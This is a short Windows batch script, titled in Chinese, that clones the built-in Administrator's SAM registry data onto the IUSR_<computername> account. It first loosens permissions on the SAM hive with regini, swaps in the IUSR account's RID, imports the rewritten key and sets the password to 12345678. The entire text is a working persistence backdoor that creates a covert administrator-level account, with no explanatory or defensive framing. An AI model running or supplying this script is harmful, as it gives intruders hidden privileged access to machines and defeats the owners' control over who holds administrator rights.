windows 复制隐藏帐号完全批处理

echo off
setlocal enabledelayedexpansion
echo %computername%
echo hkey_local_machine\sam\sam [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" hkey_local_machine\sam\sam\domains\account\users\names\iusr_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find iusr_%computername% 的对应id
for /f "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" hkey_local_machine\sam\sam\domains\account\users\000001f4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set tmp=%%j
set "tmp=!tmp:000001f4=00000%iusr_id:~0,3%!"
echo !tmp!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo hkey_local_machine\sam\sam [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user iusr_%computername% 12345678